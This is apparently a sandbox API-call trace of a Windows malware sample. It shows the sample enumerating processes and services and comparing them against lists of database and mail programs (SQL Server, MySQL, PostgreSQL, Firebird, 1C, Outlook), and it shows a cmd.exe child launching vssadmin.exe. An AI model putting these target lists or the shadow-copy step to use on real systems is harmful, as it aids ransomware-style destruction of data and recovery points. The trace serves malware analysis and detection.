	[0054.747] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0054.748] lstrlenW (lpString="csrss.exe") returned 9
	[0054.748] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0054.748] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0054.748] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0054.748] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0054.748] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0054.748] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0054.748] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0054.748] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0054.748] lstrlenW (lpString="wininit.exe") returned 11
	[0054.748] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0054.748] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0054.748] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0054.748] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0054.749] lstrlenW (lpString="csrss.exe") returned 9
	[0054.749] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0054.749] lstrlenW (lpString="winlogon.exe") returned 12
	[0054.749] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0054.750] lstrlenW (lpString="services.exe") returned 12
	[0054.750] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0054.750] lstrlenW (lpString="lsass.exe") returned 9
	[0054.750] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0054.751] lstrlenW (lpString="lsm.exe") returned 7
	[0054.751] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0054.751] lstrlenW (lpString="svchost.exe") returned 11
	[0054.751] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0054.752] lstrlenW (lpString="svchost.exe") returned 11
	[0054.752] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0054.752] lstrlenW (lpString="svchost.exe") returned 11
	[0054.752] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0054.753] lstrlenW (lpString="svchost.exe") returned 11
	[0054.753] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0054.753] lstrlenW (lpString="svchost.exe") returned 11
	[0054.753] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0054.754] lstrlenW (lpString="audiodg.exe") returned 11
	[0054.754] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0054.754] lstrlenW (lpString="svchost.exe") returned 11
	[0054.754] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0054.755] lstrlenW (lpString="svchost.exe") returned 11
	[0054.755] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0054.755] lstrlenW (lpString="dwm.exe") returned 7
	[0054.755] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0054.756] lstrlenW (lpString="explorer.exe") returned 12
	[0054.756] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0054.756] lstrlenW (lpString="spoolsv.exe") returned 11
	[0054.756] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0054.757] lstrlenW (lpString="taskhost.exe") returned 12
	[0054.757] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0054.757] lstrlenW (lpString="svchost.exe") returned 11
	[0054.757] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0054.757] lstrlenW (lpString="taskeng.exe") returned 11
	[0054.758] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0054.758] lstrlenW (lpString="taskhost.exe") returned 12
	[0054.758] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0054.758] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0054.758] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0054.759] lstrlenW (lpString="python tragedy.exe") returned 18
	[0054.759] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0054.759] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0054.759] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0054.760] lstrlenW (lpString="computers.exe") returned 13
	[0054.760] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0054.760] lstrlenW (lpString="separated.exe") returned 13
	[0054.760] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0054.761] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0054.761] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0054.761] lstrlenW (lpString="darkness.exe") returned 12
	[0054.761] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0054.762] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0054.762] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0054.762] lstrlenW (lpString="sophisticated.exe") returned 17
	[0054.762] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0054.763] lstrlenW (lpString="wishlist.exe") returned 12
	[0054.763] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0054.763] lstrlenW (lpString="top.exe") returned 7
	[0054.763] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0054.764] lstrlenW (lpString="implemented.exe") returned 15
	[0054.764] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0054.764] lstrlenW (lpString="comp.exe") returned 8
	[0054.764] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0054.765] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0054.765] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0054.765] lstrlenW (lpString="solved.exe") returned 10
	[0054.765] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0054.766] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0054.766] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0054.766] lstrlenW (lpString="trips.exe") returned 9
	[0054.766] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0054.767] lstrlenW (lpString="tumormanual.exe") returned 15
	[0054.767] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0054.767] lstrlenW (lpString="telecom.exe") returned 11
	[0054.767] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0054.768] lstrlenW (lpString="realistic.exe") returned 13
	[0054.768] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0054.768] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0054.768] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0054.959] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0054.964] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0054.974] lstrlenW (lpString="cmd.exe") returned 7
	[0054.976] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0054.985] lstrlenW (lpString="conhost.exe") returned 11
	[0054.988] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0054.996] lstrlenW (lpString="vssadmin.exe") returned 12
	[0054.996] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0054.999] lstrlenW (lpString="VSSVC.exe") returned 9
	[0054.999] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0054.999] lstrlenW (lpString="svchost.exe") returned 11
	[0054.999] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0055.000] CloseHandle (hObject=0x21c) returned 1
	[0055.000] Sleep (dwMilliseconds=0x1f4) 
	[0055.621] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fe00
	[0055.621] EnumServicesStatusExW (in: hSCManager=0x7e0fe00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0055.621] GetLastError () returned 0xea
	[0055.621] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xbb20050
	[0055.621] EnumServicesStatusExW (in: hSCManager=0x7e0fe00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbb20050, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbb20050, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0055.622] CloseServiceHandle (hSCObject=0x7e0fe00) returned 1
	[0055.622] lstrlenW (lpString="Appinfo") returned 7
	[0055.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0055.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0055.622] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0055.622] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0055.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0055.622] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0055.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0055.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0055.622] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0055.622] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0055.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0055.622] lstrlenW (lpString="AudioSrv") returned 8
	[0055.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0055.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0055.623] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0055.623] lstrlenW (lpString="BFE") returned 3
	[0055.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0055.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0055.623] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0055.623] lstrlenW (lpString="CryptSvc") returned 8
	[0055.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0055.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0055.623] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0055.623] lstrlenW (lpString="CscService") returned 10
	[0055.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0055.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0055.623] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0055.623] lstrlenW (lpString="DcomLaunch") returned 10
	[0055.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0055.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0055.623] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0055.623] lstrlenW (lpString="Dhcp") returned 4
	[0055.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0055.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0055.623] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0055.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0055.623] lstrlenW (lpString="Dnscache") returned 8
	[0055.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0055.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0055.624] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0055.624] lstrlenW (lpString="DPS") returned 3
	[0055.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0055.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0055.624] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0055.624] lstrlenW (lpString="eventlog") returned 8
	[0055.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0055.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0055.624] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0055.624] lstrlenW (lpString="EventSystem") returned 11
	[0055.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0055.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0055.624] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0055.624] lstrlenW (lpString="gpsvc") returned 5
	[0055.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
